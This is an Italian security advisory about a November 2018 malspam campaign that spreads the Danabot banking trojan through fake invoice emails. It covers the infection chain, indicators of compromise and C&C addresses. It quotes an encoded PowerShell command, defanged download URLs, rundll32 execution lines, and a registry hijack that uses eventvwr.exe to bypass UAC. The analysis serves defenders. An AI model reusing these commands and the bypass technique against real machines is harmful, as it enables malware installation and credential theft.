Campagna di Malspam diffonde il Trojan Danabot anche in Italia

28/11/2018

danabot malspam malware


Nell’ultima settimana è stata tracciata una nuova campagna di Malspam volta a diffondere il pericoloso Trojan Danabot.

Catena d’Infezione

Come di consueto, la catena d’infezione viene avviata mediante messaggi di posta elettronica fraudolenti, confezionati ad-hoc utilizzando metodi di “ingegneria sociale” al fine di indurre la vittima ad aprire allegati infetti e/o a cliccare su link presenti nel corpo del messaggio.

Nel caso analizzato da TG Soft le email fraudolente contengono falsi riferimenti a “Processi di Fatturazione” e allegati con archivi .rar malevoli. L’archivio .rar contiene al suo interno uno script “vbs” il quale, una volta eseguito, rimane silente per alcuni minuti prima di avviare l’infezione dell’host scaricando il Trojan “Danabot“.

Di seguito riportiamo un esempio di mail fraudolenta e relativa analisi effettuata dai ricercatori TG Soft:

Dettagli tecnici

Lo script .vbs effettua tentativi di connessione verso la seguente URL:

  • https://kortusops[.]icu

dalla quale riceve vari comandi VBScript o Powershell, come riportati di seguito:

powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AY
QBkA[........]bwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AJwAg
ACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==

Uno dei comandi Powershell tenta di collegarsi alle seguenti URL:

  • flutysowf[.]club/chkesosod/downs/EFnfZ
  • http[:]//kortusops[.]icu/fax[.]php?id=admin

al fine di scaricare il seguente payload del malware e posizionarlo nella cartella temporanea dell’utente (%TEMP%):

  • Nome File: iVRYziRI.dll
  • Dimensione: 307200 Bytes
  • Data di compilazione: 26/11/2018 – 22:53:06
  • Md5: 54F9A571CEFD6FA6A9E855BF5F6777D7

Quest’ultimo file, la DLL denominata “iVRYziRI.dll viene successivamente eseguita da rundll32.exe mediante il comando:

  • C:\WINDOWS\System32\rundll32.exe C:\Users\[UTENTE]\AppData\Local\Temp\iVRYziRI.dll,f1

Un ulteriore comando inviato dal C&C “kortusops[.]icu” effettua inoltre la modifica della seguente chiave di registro:

  • HKCU\Software\Classes\mscfile\shell\open\command

con il seguente valore che punta ad eseguire la DLL:

  • C:\WINDOWS\System32\rundll32.exe C:\Users\[UTENTE]\AppData\Local\Temp\iVRYziRI.dll,f1

Infine viene eseguito il processo di sistema “eventvwr.exe” che grazie alla chiave modificata in precedenza esegue la DLL del malware:

  • C:\WINDOWS\System32\rundll32.exe C:\Users\[UTENTE]\AppData\Local\Temp\iVRYziRI.dll,f1

Conclusioni

Il Trojan “DanaBottenta di collegarsi ai suoi server di comando e controllo (C&C) che riportiamo nella lista degli IoC.

Danabot” consente di condurre attacchi di tipo

  • man-in-the-browser;
  • sottrarre credenziali di sistema;
  • sottrarre credenziali del browser;
  • sottrarre credenziali del client di email;
  • ottenere l’accesso remoto via VNC e RDP.

Il terzo stage del malware consiste nell’effettuare la persistenza sulla macchina infetta grazie ad un servizio che eseguirà il malware ad ogni riavvio del PC, questa fase non è stata ancora portata a termine dall’analisi condotta da TG Soft.

Da analisi closint effettuate dal CERT-PA relativamente ai server con indirizzo IP 192.71.249.50 e 176.119.1.100, è emerso che la campagna per veicolare Danabot ha avuto inizio il 10 novembre con un picco massimo di download nei giorni compresi tra il 19 e il 24.

Indicatori di Compromissione

  • IoC (.txt) – File globale : Domini, Urls, hash files (SHA1, MD5 e SHA256), IPv4
  • IoC (HASHr.txt) – Lista dei soli hash file da utilizzare in combinazione con il tool HASHr